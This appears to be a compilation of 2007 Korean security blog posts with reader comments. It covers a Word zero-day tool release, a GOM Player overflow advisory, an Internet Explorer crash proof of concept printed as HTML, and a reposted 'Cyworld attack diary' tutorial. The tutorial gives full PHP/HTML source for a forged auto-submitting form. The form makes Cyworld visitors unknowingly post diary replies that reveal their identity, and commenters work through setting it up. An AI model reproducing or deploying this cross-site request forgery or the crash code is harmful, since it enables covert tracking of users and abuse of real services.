MS 워드의 제로데이 취약점 공격툴 공개 (한글 윈도우용)


지난 주에 "MS 워드의 제로데이 취약점 해킹 동영상 공개" 라는 제목의 글을 올린 바 있습니다. shuny2k 님이 당시 공개된 도구를 테스트해보시고 아직 한글 윈도우에서는 정상 작동하지 않는다는 정보를 제공해주셨는데요, 그새 주말 사이에 한글 윈도우에서도 작동하는 공격툴이 milw0rm 을 통해 공개되어서 각별한 주의가 필요합니다.


( 공격툴에 대한 설명 문서의 내용 )


공격툴에 대한 설명 문서를 보시면 풀패치된 한글 윈도우 XP SP2 에서 해당 도구가 정상 작동한다고 나와 있네요.?보안 분야를 잘 모르시는 분들은?놀라셨을지 모르겠습니다만, 일반적으로?해외 사이트에 공개된 공격 도구가 하루나 이틀 정도면 한글 윈도우 환경에 맞도록 Porting 되는게 현실이기 때문에 그다지 놀랄 일은 아닙니다.

이제 공격 도구도 공개되었고 하니 보안 담당자와 악의적인 해커의 입장이 서로 대등해졌군요. 중국 해커들이나 상업적?이유로 해킹을 하는 업자들은 이미 예전부터 자체 제작한 공격툴을 갖고 있었을테구요, 바쁘거나 혹은 기술적으로 모르겠거나 하는 다양한 이유로 대응하지 못했던 보안 담당자들은 이 툴의 공개로 인해 관련 보안 업체의 패턴 업데이트나 취약점 점검 도구의 혜택을 받을 수 있게 되겠네요.

물론 이 툴의 공개로 인해 악의적인 해킹 도구도 늘어날 것입니다. 그러나 예전에는 0-day 공격툴에 무방비로 노출된 상태였다면, 지금은 방어할 수 있는 기반 환경이 갖추어진 상태라는 점에서 이 툴의 공개를 부정적으로 바라볼 필요는 없다고 생각합니다.

이번 MS 워드 2000의 취약점은?아직 패치가 안나온 0-day 취약점이기 때문에 개인 사용자 입장에선 알아서 주의하는 방법 외에 딱히 뾰족한 방법이 없습니다. 오피스 2000 사용자, 혹은 MS 워드 2000 사용자라면 외부에서 첨부되어 오는 워드 문서를 열어볼 때 의심스러운 점이 없는지 각별히 주의하시기 바랍니다. 보다 상세한 사항은 아래의 "MS 워드의 제로데이 취약점 해킹 동영상 공개"라는 글을 참고하세요.

-- 추가 --
그나저나... 공격툴 공개한 강봉구님, 정말 안됐습니다. 앞으로 욕 많이 먹을텐데... 저도 욕 많이 먹으면서 생긴 노하우라면, '남이야 뭐라든 간에 보안 환경 강화를 위해 옳은 길이라면 꾸준히 가련다.' 라는 생각을 하게 되었다는 거랄까....



이 글과 관련있는 글을 자동검색한 결과입니다 [?]





# by 헐랭이 | 2007-02-05 22:27 | 보안 정보 | 트랙백 | 덧글(2)





트랙백 주소 : http://swbae.egloos.com/tb/1504333
내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]

Commented by LEE at 2007-02-06 10:49 # x




음 근데 아무리 봐도 코드는 공개되어있질 않네요?doc문서도 열리질 않는것 같구요..


Commented by 헐랭이 at 2007-02-06 12:58 #




이번 취약점은 Word 문서를 열어볼 때 일어나는 것이기 때문에 별도의 코드가 필요없습니다. 그리고 공격툴을 테스트해보시려면 IE 로 열지 마시고, wget 등의 프로그램을 이용해서 다운로드 받아서 local 컴퓨터에서 테스트하세요. IE 에서 MIME 타입을 보고 Word 가 열리려고 하기 때문에 제대로 열리질 않는 것입니다. 프로세스 트리를 조금 생각해보시면 왜 그런지 아실 듯...




출처: http://swbae.egloos.com/1504333
신고
  1. 강봉구 2016.03.20 21:13 신고

    아.. 옛 기억이 다시금... 그리고 욕먹는 네거티브 결과가 아닌 정 반대의 결과가 있었드랬지요.
    물론 일선의 이야기가 모두 귀에 들리진 않았겠지만서도. 피부로 와닿는 건 그렇지 않았네요.
    나름 계산적 행동이었으니까요.


곰 플레이어 보안 취약점



동영상 플레이어로 유명한 곰 플레이어에서 보안 취약점이 발표되었습니다.?음악 좀 들어보려고 클릭했다가?자기도 모르게 해킹을 당할 상황이군요.



( 해외 보안 정보 사이트인 Secunia 에 공개된 취약점 정보 )

Parvez Anwar 라는 외국 해커에 의해 발견되었는데, 동영상 재생을 위한 플레이 리스트 포맷으로 자주 사용되는 ASX 파일을 처리할때 전형적인 스택 버퍼 오버플로우가 발생한다고 합니다. 보안 권고문 내용으로 봐선 동영상 파일 URI 를 처리할 때 문자열 을 처리하는 부분에 버퍼 오버플로우가 존재하는게 아닌가 싶은데...

현재 곰플레이어 제작 업체인 아이팝에서 취약점이 해결된 2.1.1 버전을 배포하고 있으니 최신 버전으로 업데이트하시기 바랍니다.

그나저나 이름이 Parvez 라면 브라질 쪽인가요?


이 글과 관련있는 글을 자동검색한 결과입니다 [?]





# by 헐랭이 | 2007-02-06 13:20 | 보안 정보 | 트랙백(1) | 덧글(3)





트랙백 주소 : http://swbae.egloos.com/tb/1504714
내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]

Tracked from kligg.com at 2007-02-06 16:46 #




제목 : 곰 플레이어 보안 취약점
곰플레이어에 보안 취약점이 발견되었다고 합니다. 최신 버전에서는 해결되었다니 업데이트해야겠네요....more

Commented by jinaida at 2007-02-06 14:09 #




덕분에 업데이트 했네요^^


Commented by D-cat at 2007-02-06 14:14 #




동영상보기가 겁나네요;ㅅ;
아무생각없이 곰플레이어쓰고 있었거든요

Commented by fullc0de at 2007-02-06 16:50 # x




XFTAS를 통해서 소식을 접했는데 링크가 깨졌었거든요.. secunia에서 정보를 얻을 수 있었군요. 감사합니다.~




출처: http://swbae.egloos.com/1504714
신고

인터넷 익스플로러 제로데이 취약점 해킹툴 공개


최신 패치가 적용된 인터넷 익스플로러 6 를 원격에서 크래쉬 시키는 제로데이 취약점이 공격툴과 함께 공개되었습니다. 요새 제로데이 취약점?정보를 너무 자주 올려서 좀 느긋하게 올릴까 생각을 하고 있었는데 fullc0de 님이 먼저?선수를 치셨네요.


?????????????????????????????? ( 해외 보안 정보 사이트인?milw0rm 에 공개된 취약점 정보 )

이번 취약점의 경우는 그래도 사용자?PC 를 장악하는게 아니라, 익스플로러만 죽이기 때문에 어찌보면 다행이라고 생각됩니다. 물론 더 심각하게 발전될 소지가 있는지에 대해선 조사를 해봐야 알겠습니다만...

취약점이 발견된 mshtml.dll 파일은?예전부터 보안에 악명?높은 모듈로 구글을 뒤져보면 그간의 이력을?알수 있습니다. 그렇다고 '거봐라 역시?익스플로러는 보안에 문제가 많다니까...' 라고 오버할 필요까지는 없을 듯 하네요. 웹 브라우저는 JavaScript, HTML, 이미지 등 다양한 데이터를 파싱해서 화면에 적절하게 뿌려주는 역할을 하는, 내부적으로 매우 복잡한 프로그램입니다.?웹 브라우저가 HTML 파일을 처리하는 과정에서 오작동해서 죽는 것도 무리는 아니죠.

milw0rm 에 공개된?공격툴은
<html>
<head>
<title> AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, RC_No1@gmail.com)</title>
</head>
<body>
<script language='javascript'>
var data = document['getElementById'];
for(var key in data);
</script>
</body>
</html>

와 같은 몇 줄?안되는 간단한 HTML 소스 입니다. 문서에 적혀진 바에 따르면 위와 같이 잘못짠 HTML 소스 내에서 for 문을 처리하는 과정에서 익스플로러가 죽어버린다고 하네요.

이 번 취약점은 AmesianX 라는 닉네임을 사용하는 한국 해커에 의해 발견된 것 입니다. fullc0de 님도 말씀해주신 바와 같이 요새 보안 분야에서 한국 인력들의 해외 활동이 보다 활발해져서 다행이네요. 예전에는 정말 '조용한 아침의 나라' 였었는데...

-- 추가 --
fullc0de 님 글에 트랙백이 안가지네요.
그림이 잘 안보이시는 분들은 그림을 클릭하시면 확대되서 보입니다.

-- 추가2 --
대책이요? 흠... zero-day 취약점이라 대책이.... 없습니다. T_T
인터넷 서핑하시다가 갑자기 브라우저가 '푹' 하고 꺼지면 다시 실행시키는 수 외엔~


이 글과 관련있는 글을 자동검색한 결과입니다 [?]





# by 헐랭이 | 2007-02-06 22:57 | 보안 정보 | 트랙백 | 덧글(6)





트랙백 주소 : http://swbae.egloos.com/tb/1505025
내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]

Commented by coderant at 2007-02-07 23:32 #




전에 말한 AmexianX가 취약점 찾아냈다고 하던게 이거였나 보네요


Commented by coderant at 2007-02-07 23:39 #




테스트 해봤는데 패치가 나왔나요 내거는 안죽는데
IE 6.0.2900.2180_SP2_gdr.05031-1519

Commented by 헐랭이 at 2007-02-08 02:21 #




제 경우 Windows 2000 의 IE 6.0.2800.1106 SP1 인데 잘 죽습니다. XP 랑 2k 랑 패치 레벨이 틀린가 보네요?


Commented by LEE at 2007-02-08 11:34 # x




MS오류보고 와 함께 브라우저 닫히는게 맞나요? 제 경우는 win2k advance server ie 6.0 1106잘죽네요..


Commented by fullc0de at 2007-02-08 11:37 #




트랙백 공격에 대응하는 것이 너무 피곤한 일이여서 저두 egloos로 이사했습니다. ^^
이제 이웃사촌이 된건가요? ㅎㅎ fullc0de.egloos.com 으로 ^^

Commented by 헐랭이 at 2007-02-08 14:38 #




fullc0de// 잘 오셨어요. 앞으로 잘부탁드립니다. *^^*




출처: http://swbae.egloos.com/1505025
신고

싸이월드 방문자 추적 프로그램 뉴스화


네이버 뉴스에 드디어 '싸이월드 방문자 추적 프로그램 유포?(원문 중앙일보)'라는 제목의 기사가 나왔네요. 싸이월드 보안팀 담당자들이 이글루스에 가끔 들른다는 사실을 알고 있는 저로서는 워니님의 "싸이월드 공격 일지" 시리즈를 보면서 가슴이 조마 조마했습니다. 더구나 이글루스나 싸이월드나 같은 SK 계열사 아닙니까? 이글루스 IT 카테고리에서 상위에 랭크되곤 하는 위 시리즈가 언젠가는 싸이월드 보안팀 귀에 들어갈게 불보듯 뻔한 일이었죠.

뉴스로 봤을 때는 뉴스거리 찾아 블로그를 돌아다니던 기자가 먼저 발견해서 싸이월드에 알려준 것인지, 싸이월드 보안팀이 먼저 발견해서 기자에게 기사거리를 제공한 것인지 모르겠습니다.

기사를 보면 "스토리룸을 이용해서 방문자를 추적한다" 고 구체적인 공격 메커니즘을 밝히고 있는데, 워니님이 공개한 공격 기법과 정확히 일치하는군요.

앞으로 워니님이 어떻게?될지 좀 걱정이 됩니다. 블로그를 보면 잠수 타시겠다고 하셨는데...

미국판 싸이월드라고 하는 MySpace?의 경우?다양한 취약점으로 인해 웜이?두 차례나 발생해 최초의 Web 2.0 웜으로 기록되는 불명예를 안게 되었죠. 취약점을 이용해 방문자 추적 서비스를 제공하는 회사도 있구요.

싸이월드나 싸이월드 2가 앞으로 보안 강화를 위해 어떤 행보를 보여줄지 귀추가 주목됩니다.

참고 자료
1. 싸이월드 공격 일지 #1
2. 싸이월드 공격 일지 #2
3. 싸이월드 공격 일지 #3

 


 



출처: 보안 전문가님이신... http://swbae.egloos.com/tb/1519059
신고

워니. 추억ㅇㅔ ㅂㅣ추ㅇㅓ. iwonny.egloos.com valley log-in



싸이월드 공격 일지 3 - 방문자를 추적해보자


update 2007-02-28
현재 다이어리에 리플로 달리는 방식은 막혔습니다.
게시판에서 막은 대로 where_chk 를 걸어 놓았군요.
....다만 아직 스토리룸에 올려져있는 제 플래시 링크는 내려지지 않았군요, 저런ㅋㅋㅋ (음흉음흉)

일단, 저는 잠시 잠수타겠습니다 -
모두들 즐거운 하루 되세요~~

싸이월드 화이팅, 좀 더 보안에 힘써주세요-_-)b

----

아아, 정말 죄송합니다.
포스팅이 늦어졌군요.
(동호회에서 하는 공연이 코앞이라서.. - 괜히 바쁜척은 저 혼자 다하는군요 ㅠ_ㅠ ㅎㅎ)

사장님 오시기전에 얼른 간략하게 포스팅 하겠습니다~
/*
참, 이미 하는 방법들을 [스토리룸에 플래쉬 올리기]포스트에 리플로 많이 달아주셨더라구요~ 참고하시고,
혹시 저걸 보고 모르겠고, 그냥 작동만이라도 하면 좋겠다고 생각되시면 봐주세요 ㅎㅎ
*/


#. 원리
조만간 업데이트 하도록 하죠,
간단한거니까 많이들 아시리라고 생각해요 ㅎㅎ


#. 방법
일단, 다이어리에 새로운 일기를 하나 써봅시다.
비밀로 써야겠죠? ㅎㅎ

그리고는 다이어리 - 목록 으로 들어가서 방금 쓴 글에 마우스 오른쪽 클릭을 하고 속성을 살펴봅시다.




보이시나요? 저 두 숫자를 잘 적어 놓읍시다. 앞에 것이 tid이고, 뒤의 것이 item_seq 입니다.

음, 화면 캡쳐할 시간이 있나 모르겠네요.

아하! 여기 좋은 레퍼런스가 있군요.
[솔솔시료님 포스트]

/*솔솔시료*/님께서 2번에 설명해 놓으신 플래쉬 작성방법을 숙지해 주십시오.

getUrl(`이동할 페이지 주소');

에서 이동할 페이지 주소

1.
http://www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다이어리번호

혹은

2.
http://www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다이어리번호&img=이미지주소

3.
http://www.iwonny.net/source/cy_count/storyroom.php?tid=자신의tid&item_seq=다이어리번호&embed=플래시주소

를 적어 넣습니다.

아까 적어 놓았던 tiditem_seq를 각각 넣어주면 되겠죠?
2번을 사용할 경우 이미지주소에 있는 이미지를 출력해 줍니다.
3번을 사용할 경우 플래시주소에 있는 플래시를 출력해 줍니다.(미니룸사이즈 400x200으로 출력합니다.)
(1번을 사용하면, 제가 사용하고 있는 그저 기본 이미지가 출력됩니다.)

저 안에는 자동으로 리플을 달아주는 소스코드가 들어있습니다.
간단한 것인데, 시간날 때 올려 놓도록 할게요 -
기록은 안남으니까 걱정마세요 ㅎㅎ

그리고는 그 플래시를 스토리룸에 올리면?

플래시가 로딩되고나서 다이어리에 가봤더니 리플이달려있으면 성공이겠죠?
자, 축하드립니다 -
오늘도 좋은하루 되세요~
(와, 딱 업무시간 시작이군요 ㅎㅎ)


*.ps 많은 분들이 댓글을 달아 주셨는데, 제가 생각하고있는 인터넷 문화와는 조금 다른 생각을 가지신 분들이 있군요? 덕분에 이런저런 생각을 하게 되었습니다. 조만간 그에 대한 생각도 포스팅도 해봐야겠어요 ㅎㅎ



*.ps - storyroom.php 소스코드

<?
$tid;
$item_seq;
if(!$img) $img="./fake.jpg";
$date = time();
?>
<html>
<body leftmargin=0 topmargin=0>
<form name="reply_frm0" method="post" action="
http://minihp.cyworld.nate.com//pims/diary5/mydiary/diary5_replyok.asp" target="fake">
<input type="hidden" name="list_type" value="1">
<input type="hidden" name="toyearmonday" value="20070226">
<input type="hidden" name="item_seq" value="<?=$item_seq?>">
<input type="hidden" name="folder_no" value="0">
<input type="hidden" name="review_seq" value="">
<input type="hidden" name="open_item_seq" value="">
<input type="hidden" name="seq_type" value="0">
<input type="hidden" name="reply" value="">
<input type="hidden" name="tid" value="<?=$tid?>">
<input type="hidden" name="content" style="width:220px;"class="input2" value="<?=$date?>">
</form>
<img src="<?=$img?>" />
<iframe src="./blank.php" name="fake" width="0" height="0" ></iframe>
<script language="javascript">
<!--
document.getElementById('reply_frm0').submit();
-->
</script>
</body>
</html>



간단하죠? ㅎㅎ

# by 워니 | 2007-02-27 09:33 | 컴이야기 | 트랙백 | 덧글(179)




트랙백 주소 : http://iwonny.egloos.com/tb/3021127
내 이글루에 이 글과 관련된 글 쓰기 (트랙백 보내기) [도움말]

Commented by 워니 at 2007-02-27 10:19 #





php를 제공하는 웹 호스팅이나, 자신의 서버에 올리시면 됩니다.
(직접 돌리실 게 아니라면 꼭 올릴 필요는 없지만요 ㅎㅎ)

Commented by 워니 at 2007-02-27 10:25 #





앗, 아이 민망해라,
질문한 리플을 지워버리셨네...쿨럭;

Commented by 자유 at 2007-02-27 10:25 #





아무도 안 궁금한데 !


Commented by 자유 at 2007-02-27 10:25 #





혼자 논다 이성원 *^^*


Commented by fan at 2007-02-27 10:29 # x





저기요.. 다 됫는데 스토리 룸에서 저장 하고 확인전에 proxy켜서
워니님이 스샷 올린것과 똑같이 떠서
주소를 밑줄그은 부분을 MM_0라고 바꾼 플래시 파일이
있는 주소로 바꾸고 forward 누르면

없는 아이템인가? 그거 뜨면서 안되요..ㅠ
어쩌죠...

Commented by dk at 2007-02-27 10:29 # x





수고하시네요 따라하다보면 시간가는줄 모릅니다~


Commented by marine at 2007-02-27 10:33 # x





감사합니다
지금 막 따라합니다!! 오늘 싸이에서 막으면 스토리룸 잠시 바꾸어 두려구요..ㅋㅋ

Commented by 궁구미 at 2007-02-27 10:34 # x






최초 질문을 지운 사람입니다. 죄송하네요...

질문이 너무 수준이 낮은거 같아서서..지웠습니다..ㅋㅋㅋ

공개한 소스는 지금 워니 님... 서버에서 돌아가나 봅니다..

근데 지난번 방법으로 스토리룸에 플래쉬를(이름을 같게, 웹상에 링크) 올려도 감감 리플이 안달리더라구요..어쩌면 좋죠?

Commented by 워니 at 2007-02-27 10:45 #





자유// 뭐야-_-ㄲㄲ
fan// 으음, MM_0.swf 라고 바꾸신 것 맞나요? 바꿔주는 위치와 파일명이 정확히 같아야 그 메세지가 뜨지 않아요 ㅎㅎ
marine// ㅎㅎ 화이팅입니다~
궁그미// 아뇨아뇨 뭘요 ㅋ 네 맞아요 제 서버에서 돌아가고 있어요;;(호스팅 받는거긴 하지만 ㅎㅎ)
음, 지난번 방법이라면 /*솔솔시료*/님 블로그에 있는 방법 말씀하시는 건가요?
싸이측에서 게시판에는 자동으로 리플을 못달게 수를 써 놓았거든요.
그런데 귀찮았는지 다이어리쪽은 막지 않았군요 ㅋ
그래서 이번엔 다이어리쪽으로 사용한 것 밖에 다른 점이 없습니다~

Commented by 에버태지 at 2007-02-27 10:46 # x





이런 고려대학교 컴공과 삼성원
네녀석을 부적의 이름을 걸고 싸이에 신고하겠다

Commented by 워니 at 2007-02-27 10:54 #





에버태지// ... 물어봤다 태영이형한테. 보자마자 뭔지 알던데?
"어엇! 어라? 어떻게 알았어요??"
"써있잖아.-_-"

Commented by 닭아멍멍해봐 at 2007-02-27 11:08 # x





워니님...
플래쉬 파일을 만들어서 파일이름도 바꿨습니다. 이 바꾼 파일을 어떻게 올리는지 모르겠습니다.
조금만 더 자세히 알려주시면 감사하겠습니다.

Commented at 2007-02-27 11:09 # x





비공개 덧글입니다.


Commented by marine at 2007-02-27 11:13 # x





swf파일은 게시판에 업로드후 사용하시는게 제일 편해요.
그리고.. ; _ ; 성공 했는데 덧글이 이상하게 달리네요.. 쩝;;

Commented by marine at 2007-02-27 11:13 # x





swf파일은 게시판에 업로드후 사용하시는게 제일 편해요.
그리고.. ; _ ; 성공 했는데 덧글이 이상하게 달리네요.. 쩝;;

Commented by marine at 2007-02-27 11:14 # x





성공!!! ^^/ 감사합니다!


Commented by fan at 2007-02-27 11:18 # x





게시판?
플래쉬가 돌아가야 하는거 아니엿나요?
게시판엔 그냥 파일첨부... 아닌가..;;

Commented by 궁구미 at 2007-02-27 11:19 # x





게시판에 swf 파일을 올리면 그 게시판을 클릭 하지 않은 방문자는 리플이 않달리지 않나요?

게시판에 swf파일을 올리고 클릭을 하니까 되기는 하는데... 2% 부족한듯하네요..

Commented by marine at 2007-02-27 11:22 # x





음.. 궁구미님, 이런 원리로 생각하시면 될것 같아요.

제 가 글을 하나 써놓았고 그 글의 주소가 www.1 이라고 합시다. 한 사람이 그 글을 링크가 아닌 출격으로 빼오면 그 글의 주소는 www.1 인거죠. 비록 그 홈페이지의 주소가 아니더라도요. burpproxy 이 프로그램을 이용해서 스토리룸에 swf 파일을 출격으로 빼주는것이구요.

결국 게시판에 업로드하고 swf을 스토리룸에 연동시켜서 덧글을 쓰게 만드는것이랍니다.

Commented by marine at 2007-02-27 11:22 # x





앗;; 중요한걸 빼먹었네요. 결국 연동을 시키고 로드가 끝나면 덧글은 남겨져 있게 되죠. 그러면 그렇게 방문자 추적이 가능하게 되는것이구요.


Commented by marine at 2007-02-27 11:25 # x





어;;; 제가 설명한게 틀린가요.. ; _ ; 괜히 헷갈리게 하시는것 같네요..;; 그냥 제말은 읽지 마세요...;; 이상하게 설명해놓은것 같네요.. 쩝;;


Commented by Spatialguy at 2007-02-27 11:31 #





이런 훌륭한 고려대학생같으니;;


Commented by 지나가는이.. at 2007-02-27 11:41 # x





;ㅂ;정말 컴퓨터 초보라서 그러는데요...
워니님께서 맨 밑에 써주신 소스는
어디다 넣어야하나요 ㅜㅜ ;;
어렵네요 ㅎㅎ;.

Commented by marine at 2007-02-27 11:49 # x





지나가는이.. // 저건 그냥 워니님 홈페이지 링크를 플래시파일에 넣으셔도 되요.
만약 지나가는이.. 님의 싸이 코드가 dddd 이고 다이어리 주소가 ssss 이면
플래시 파일에 getURL('http://www.iwonny.net/source/cy_count/storyroom.php?tid=dddd&item_seq=ssss')

이렇게 플래시 파일에 넣으시고 저장하시면 됩니다. (swf파일 변환)

Commented by 워니 at 2007-02-27 11:59 #





닭아멍멍해봐// 아이디 좋네요 ㅋ 싸이월드 공격일지 2 읽어봐주세요 ㅎㅎ
와 marine님 친절하게 설명해 주셨군요 -
네, 맞습니다. 간단히 다시 얘기해보자면,

C:....MM_0.swf 는 fan님 컴퓨터에 있는 것이죠?
그것을 자동으로 업로드 시켜주지는 않습니다. 주소만 가져다가 써 놓는 것이죠.
그럼 다른 사람이 들어가면 어떻게 될까요? 네, 그 사람의 컴퓨터에서 MM_0.swf 를 찾게되죠.
하지만 그 사람의 컴퓨터에는 MM_0.swf가 없으니 말짱 꽝이겠죠 ㅎㅎ
(지금은 아예 c: 자체를 파싱해서 오류 나도록 해놓은것 같군요.)

그럼 어떻게?
어 디든(게시판이어도 되고, 아니어도 상관 없습니다.) 인터넷 어딘가에 올려져 있는 플래시 파일 주소를 넣어야 하는거죠. http://www.abcd.com/MM_0.swf 처럼요. 그러면 누구든지 접속했을 때 그 플래쉬를 볼 수 있을 테고, 그러면 기록이 남는 것이겠죠?

그 플래쉬 자체를 스토리룸으로 끌어 낸 것이 싸이월드 공격일지 2 입니다.

그 플래쉬를 만드는 방법이 이 글이군요 ㅎㅎ

Spatialguy// ... 커헙;;;
지나가는이// marine님께서 친절하게 답해주셨네요 ㅋㅋ

Commented by 궁구미 at 2007-02-27 12:00 # x






성공했습니다. 플래쉬 파일이 웹상에 링크된 주소로 하니까..안되는데..marine 님 말씀처럼..
싸이게시판에 첨부하고 주소를 갖다가 플래쉬 파일에 갔다가 붙이니까..되네요..

근데 한가지 업그레이드 해야 할꺼는... 자신의 이름은 댓글이 안달리게 하면 좋겠네요..

Commented by fan at 2007-02-27 13:15 # x





워니님 답변 감사해요.ㅎ
게시판에 올리고 이 주소. 그대로 썻습니다.
http://cyimg17.cyworld.nate.com/common/file_down.asp?redirect=%2Fy54301%2F2007%2F2%2F27%2F68%2FMM%5F0%282%29%2Eswf

이렇게 하라는거죠?
그런대.. 왜 없는 아이템이라고 나오는걸까요...휴;

Commented by fan at 2007-02-27 13:18 # x





보유하지 않은 아이템이 포함되어 실패했다고 나와요..ㅠ


Commented by 쿠니쿠니 at 2007-02-27 13:37 # x





Good..


Commented by WinNie at 2007-02-27 13:49 #





아 진짜 고려대학생
근데 이거 위험한 발언인가

Commented by 워니 at 2007-02-27 13:58 #





fan// 파일명이 MM_0.swf 가 아닌 듯 싶은데요? 맨 끝부분이 MM%5F0%2Eswf 로 나와야 하는데 MM%5F0%282%29%2Eswf 로 나오는 군요. (싸이측에서 다른식으로 변환하는지 어떤지는 저도 잘 모르겠습니다만 .. 여하튼 결과물은 MM%5F0%2Eswf 로 나와야 합니다.)
^^// 아마도 getURL 이라고 쓰셔서 문제된것이 아닌가 합니다. getUrl 입니다. 대소문자 구분해주세요 ㅎㅎ
쿠니쿠니// ㅎㅎ
위니// ..응-_-

Commented by ^^ at 2007-02-27 14:13 # x





감사합니다. 성공했어요 ㅋㅋ
그런데 리플이 이상하게 달리는데;ㅂ;
다들 그런가요?
알수없는 숫자와함께 ㄷㄷ

Commented by fan at 2007-02-27 14:16 # x





푸하하!! 성공했어요.
올라가긴올라갔어요!

하지만.. 다른 아이디로 접속을 해보고 해도..

전혀 댓글이 달리지 않는다는거.....ㅡㅜ

Commented by ^^ at 2007-02-27 14:17 # x





fan// 저도 그래요 ㅜㅡ


Commented by 누가 at 2007-02-27 14:30 # x





아 어려워.. 전 공격일지 2부터 되지도 않는데 다들 성공이시라니..
워니님 원격조정으로좀 해주세요ㅋㅋㅋ

Commented by 누가 at 2007-02-27 14:31 # x





도토리드릴테니 누가좀 도와줘요~ 정말 답답하넹..


Commented by 닭아멍멍해봐 at 2007-02-27 14:37 # x





워니님
지금까지 플래쉬 파일도 만들고 게시판에 올리기도 했는데...
게시판에 올려져있는 글의 속성에서 나온 주소를 빨간색 줄이 있는 부분에 붙이니까 안되네요...
정확히 어떤 주소를 붙여야할지 모르겠습니다. 주소 찾는 방법 좀 알려주십시요...

Commented by 쿠니쿠니 at 2007-02-27 14:39 # x





<input type="hidden" name="toyearmonday" value="20070226">

위에 밸류값을 다이어리 적은 날짜로 바꿔주세요.

Commented by 돕는자 at 2007-02-27 14:56 # x






게시판에 플래쉬 주소...추출...하기

글을 클릭하고 첨부 플래쉬화일위에 오른쪽 버튼을 대고 속성을 봐야 플래쉬화일의 정확한 주소추출가능

(금방 화면이 바뀌므로 글을 클릭하고 빨리 추출해야 합니다...)

궁금한거 있으면 또 물어보세요...

Commented by 워니 at 2007-02-27 14:59 #





아뇨, toyearmonday 값은 리플 남기는데 아무런 영향을 미치지 않는다는 것을 확인 했습니다.
(비워놓고 실행해도 리플은 달리는군요)

알 수 없는 숫자는 제가 그렇게 해 놓은 것입니다. 같은 리플을 연속으로 두번 달았을 경우 싸이측에서 스팸처리하는 듯 하군요
( 같은 사람이 같은 글을 두번 연속으로 쓸 수 없는 것으로 보입니다. )

좀전까지 댓글이 안달리던 문제는 제가 잠깐 만지다가 실수한 것 일수도 있습니다.
지금 확인해보니 일단은 달리는군요. 다시한번 확인해 보시겠어요?

* 한 사람이 연속으로 들어왔을경우 남기는 것이 나을까요 남기지 않는것이 나을까요? 선택사항입니다만,
말해주시면 감사하겠습니다.
* 말씀해 주셨듯이 embed 로 swf를 올려 놓는것도 물론 가능합니다.
(... 만들기 귀찮아서 안만들었다는... 죄송합니다-_-a 조만간 수정해 볼게요)

Commented by 닭아멍멍해봐 at 2007-02-27 15:05 # x





죄송한데요...
제가 플래쉬파일의 주소는 추출해서 성공을 했었는데요...
스로티룸을 꾸밀때 제가 모르고 메모장에 글을 쓰는 바람에 글이 나타났다가 사라지길래
스토리룸을 비워버렸는데 다시 할려고 하니 화면이 계속 바뀌어서 안되네요...
이걸 어떻게 해야될까요??
처음대로 다시 돌릴수는 없을까요??

Commented by ^^ at 2007-02-27 15:09 # x





돕는자님~
알려주신데로 게시판주소를 추출하여
빨간글씨에 넣는거 맞죠;ㅅ;

그렇게 했는데 플래쉬 그림으로 안바뀝니다..
뭐가 문제죠 ㅠㅠ

Commented by 돕는자 at 2007-02-27 15:10 # x





좋습니다... 처음으로 되돌릴 방법....은..

워니님의 캡쳐화면으로 스토리룸 재저장을 해서 주소를 확인해 보시면 주소가 최초주소로 되어 잇는지..
(원래 최초주소는 워니님이 일지에 올려서 빨간색으로 밑줄그은 그 주소가 진짜 주소)

아니면 다른주소(본인이 올렸던) 박뀌어져 잇는지 확인하시고..

저도 그 부분때문에 애먹었는데... 잘 안되면 처음 주소로 포워딩을 한번 한뒤에 다시한번
새로운주소(게시판의 플래쉬화일주소)등으로 한번더 포워딩을 해서 스토리룸에 저장하면

될것입니다..

그나저나...본인이 볼때도 댓글이 달리니...댓글이 너무 많이 달려서 지우는게 힘드네요..

Commented by 돕는자 at 2007-02-27 15:11 # x





님의 성공을 위해 기도합니다.^^*


Commented by fan at 2007-02-27 15:13 # x





워니님.. 여전히 안달립니다...ㅠ


Commented by ^^ at 2007-02-27 15:13 # x





swf파일을 올린 게시판에 들어가 직접볼수있는;; 주인장인 저만
댓글이 달리네요..
흠 스토리룸에 게시판에 올린 swf이미지가 안ㄸㅓ요 ㅠㅠ
어렵군요;

Commented by 돕는자 at 2007-02-27 15:14 # x






다른 사람이 들어오는 경우는 연속으로라도 남는게 맞다고 봅니다.(방문자 추적의 원취지에 부합)

Commented by 쿠니쿠니 at 2007-02-27 15:19 # x





http://minihp.cyworld.nate.com//pims/diary5/mydiary/diary5_replyok.asp

pims 앞에 //가 두개 들어가있네요.

Commented by 닭아멍멍해봐 at 2007-02-27 15:22 # x





돕는자님...
제가 위니님의 캡쳐화면으로 다시 저장하고 싶지만 저장도 안되네요...
제가 스토리룸을 지울때 바로 화면이 바뀌길래 바뀌기전에 비우기 버튼을 눌렀는데
그뒤로는 밑에 있는 메모장을 쓸수도 없고 다시 저장도 안됩니다.
ㅠㅠ 도와주세요~~

Commented by 돕는자 at 2007-02-27 15:23 # x





지금 댓글이 안달리는거 같네요...

소스를 건들렸나요?

아니면 지금 리눅스에서 열었는데 그래서 안되나..

Commented by 워니 at 2007-02-27 15:40 #





pims 앞에 //가 두개 있는것은 상관이 없습니다. (증거로는, 제것이 잘돌아가고 있다는 것이 있겠네요)
닭아멍멍해봐// 제 친구 해주다가 같은 현상이 있었는데, 스토리룸 수정을 누르고 저장을 마구마구 연타해 보십세요;; 무식한 방법이지만 됩니다 ㅎㅎ

음, 제 다이어리 공개해 놓았습니다. 확인해 보시구요,
지금 현재 toyearmonday 값은 없애놓았습니다. 그러니까 그 문제는 아닐 듯 싶군요.

제가 안되면 어떻게든 해보겠는데, 제가 되니 이거 참-_-a 흠;;;;
조금 더 자세히 어떤 상황인지 가르쳐 주시면 알아보겠습니다 -

Commented by 워니 at 2007-02-27 15:42 #





참, 본인은 안달리도록 하는건 조만간 알아볼게요;; ㅎㅎ


Commented by 워니 at 2007-02-27 15:45 #





아, item_seq 에서 숫자만이 본인의 item_seq 입니다
저 위에 올려놓은 이미지를 봤을 때 #|389641116 으로 보이는데,

일삼팔구... 가 아닙니다.
삼팔구... 입니다.

1과 | 가 헷갈리는군요-_- ㅎㅎ 혹시나 노파심에;;

